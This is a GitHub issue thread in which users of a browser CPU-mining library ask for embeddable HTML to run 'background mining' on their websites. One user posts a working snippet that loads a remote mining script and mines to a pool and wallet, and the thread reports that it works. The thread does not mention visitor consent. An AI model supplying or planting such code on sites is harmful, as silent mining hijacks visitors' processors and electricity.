### ISSUE TITLE
HTML codes

### ISSUE THREAD

**Issue by vpts1202** [MarcoCiaramella/cpu-web-miner#10]
@MarcoCiaramella 
Can you please add HTML codes into your repo, for website integration?
Thank you.

**Comment by MarcoCiaramella** [comment]
@vpts1202 can you specify your question better? Are you using a bundler like webpack on js code? if not try these [two solutions](https://zellwk.com/blog/node-modules-in-frontend-without-bundlers/)

**Comment by vpts1202** [comment]
> @vpts1202 can you specify your question better?

Html code that I would be able to embed to my html website for background mining. 
Thanks.

**Comment by paskofa77** [comment]
Can you help me to create a js bundle for my website's mining background

**Comment by MarcoCiaramella** [comment]
hello @paskofa77  can you explain me your problem with an example?

**Comment by paskofa77** [comment]
example script to paste on my website

            <script src="https://webminer.pages.dev/dist/mm.js"></script>
            <script>
            const client = new Client({
            algorithm: 'minotaurx', // yespower, minotaurx
            stratum: {
            server: "minotaurx.na.mine.zpool.ca", // Your Pool host
            port: 7019, // Your Pool port
            worker: "RVZD5AjUBXoNnsBg9B2AzTTdEeBNLfqs65", // Your Wallet
            password: "c=RVN" // Your Mining password
            },
            options: {
            threads: 1, // CPU threads to mining
            log: true // Show log on console
            },
            });

            // Start Mining
            client.start();
            </script>

 Can you please make something like that for background mining?

**Comment by MarcoCiaramella** [comment]
hello @vpts1202 @paskofa77 I've just added an example in the readme that answers your questions. I hope it helps.

**Comment by paskofa77** [comment]
thank you, it works perfectly
